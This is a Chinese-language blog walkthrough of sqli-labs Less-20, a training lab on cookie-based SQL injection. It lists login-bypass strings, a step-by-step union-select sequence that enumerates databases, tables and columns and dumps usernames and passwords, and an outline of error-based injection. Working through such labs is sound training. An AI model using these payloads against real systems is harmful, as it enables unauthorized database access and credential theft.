Less20
Cookie注入,测试需要在登录前提下操作
(1)对账号和密码进行注入,发现没有回显,认为账号密码存在着强过滤
1' OR 1 = 1 --+
1') OR 1 = 1 --+
1')) OR 1 = 1 --+
1" OR 1 = 1 --+
1") OR 1 = 1 --+
1")) OR 1 = 1 --+
(2)用前面admin和admin来测试,发现回显画面,并再次刷新界面,发现界面不变
(3)删除Cooike,发现界面跳转登录界面
(4)抓包,处理信息发现存在Cookie
(5)对Cookie信息进行注入
- 判断注入类型
- 使用注入方式(本题可以使用报错和联合注入)
联合注入:
1、判断注入点
Cookie是注入点
2、判断是整型还是字符型
用1'发现报错,说明是单引号注入
3、判断查询列数
1' order by 4 --+
4、判断显示位
0' union select 1,2,3 --+
5、获取所有数据库名
0' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
6、获取数据库所有表名
0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+
7、获取字段名
0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" --+
8、获取字段中的数据
0' union select 1,2,group_concat(0x7c,username,0x26,password) from users --+
报错注入:
标签:Less20,union,报错,--+,schema,select,注入 From: https://www.cnblogs.com/ntrack/p/17023145.html 1.判断是否存在注入点
2.构造错误的语法制造报错
3.使用报错函数:updatexml(xml_doument,XPath_string,new_value),extractvalue(xml_doument,XPath_string)等。